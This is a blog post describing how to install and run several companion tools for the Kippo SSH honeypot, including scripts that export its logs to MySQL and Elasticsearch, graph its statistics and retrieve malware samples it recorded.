Division Zero (Div0). Copyright © 2011-2018

All rights reserved.

Ion’s (BruteForce Lab’s) Contributions to Kippo

Note: This is an add-on post on top of my Kippo write-up.

 

Kippo-Graph was just a small section in my previous Kippo write-up. But I thought I should dedicate an entire post to the contributions my dear friend Ioannis “Ion” Koniaris has made to Kippo, altogether now with my updated write-up.

 

Kippo2MySQL

Kippo2MySQL is a simple piece of script that extracts some very basic stats from Kippo’s text-based log files and inserts them into a MySQL database.

 

My setup already has MySQL logging features enabled by default. Nonetheless, you can still use this script to extract some very basic data from your Kippo’s text-based log files and insert them into a MySQL database.

 

My Network Setup

So not to add more stuff on my Kippo machine, I have a dedicated machine for analytics work e.g. assessing and analysing the logs.

 

Note: Do not perceive this as a recommended Kippo setup, it is just to demonstrate that not everything has to be lumped into one single machine.

On your Kippo machine:

Make sure your MySQL service is listening on your dedicated network interface. Then, grant authorisation to your analyst(s).

$ mysql -h 192.168.60.12 -u root -p

mysql> GRANT SELECT ON kippo.* TO ‘<analyst username>’@’192.168.60.10’ IDENTIFIED BY ‘<password>’;

mysql> GRANT CREATE TEMPORARY TABLES ON kippo.* TO ‘<analyst username>’@’192.168.60.10’ IDENTIFIED BY ‘<password>’;

mysql> SHOW GRANTS FOR ‘<analyst username>’@’192.168.60.10’;

 

On your analytics machine, make sure you can access the database:

$ mysql -h 192.168.60.12 -u <analyst username> -p

 

Now, with the analytics machine all set up, get all the required software that Ion requires before proceeding:

$ sudo apt-get install python-dev mysql-client libmysqlclient-dev python-pip

 

Kippo-Malware

Kippo-Malware is a Python script that downloads all malicious files stored as URLs in your Kippo MySQL database. This is useful in situations e.g. you lost your files or something happened to your Kippo machine, but your database is still intact.

 

This script is also useful in my type of setup where I only have access to my Kippo database from my analytics machine (and not the files located in the dl/ directory).

 

Get the required Python packages:

$ sudo pip install mysql-python pony requests clint

 

Get a copy of Kippo-Malware:

$ git clone https://github.com/ikoniaris/kippo-malware

 

To run Kippo-Malware:

$ python kippo-malware.py -h

$ python kippo-malware.py -H 192.168.60.12 -u <analyst username> -p <password> --debug

 

The script also supports HTTP proxy usage to cover your IP address from malicious servers and custom User-Agent values.

 

Kippo-Graph

Kippo-Graph is a full featured script which visualise stats from a Kippo honeypot.

 

Get the software Kippo-Graph needs:

$ sudo apt-get install libapache2-mod-php5 php5-mysql php5-gd php5-curl

 

Get your Apache Web server started:

$ sudo /etc/init.d/apache2 restart

 

Get your Kippo-Graph up and running:

$ cd /var/www/html

$ sudo git clone https://github.com/ikoniaris/kippo-graph

$ chmod 777 generate-graphs

$ cp config.php.dist config.php

$ vi config.php

 

Configure your Kippo-Graph configuration appropriately. Make sure to be pointing to the correct database, with the right credentials.

 

Browse to http://<your-web-server>/kippo-graph, and there you have it!

 

Kippo2ElasticSearch

Kippo2ElasticSearch is a Python script that can be used to transfer data from a Kippo MySQL dataset to an Elasticsearch instance.

 

Get the necessary packages:

$ sudo apt-get install libgeoip-dev

$ sudo pip install geoip pony pyes

 

Get a copy of Kippo2ElasticSearch:

$ git clone https://github.com/ikoniaris/kippo2elasticsearch

 

Configure kippo2elasticsearch.py according to your configurations, make sure your Elasticsearch is up and running, and finally – run the Python script:

$ python kippo2elasticsearch.py

 

If you examine the script properly, you’d realised that the script simply take the results from the following MySQL query, and populate it in an Elasticsearch instance:

SELECT auth.*, sessions.ip, clients.version, sensors.ip
FROM auth
INNER JOIN sessions ON auth.session = sessions.id
INNER JOIN clients ON sessions.client = clients.id
INNER JOIN sensors ON sessions.sensor = sensors.id;

 

With your dataset now on Elasticsearch as an instance, you can visualise some stats using Kibana.

 

I learned Elasticsearch and Kibana from the very beginning so to play with this. It’s very easy to get the basics right – You just need to dedicate a bit of your time to learn. Elastic provides many comprehensive guides: https://www.elastic.co/guide/index.html.

Share on Facebook
Share on Twitter
Please reload

RECENT POST

September 5, 2017

Please reload

CATEGORIES
Please reload

TAGS
RSS
RSS Feed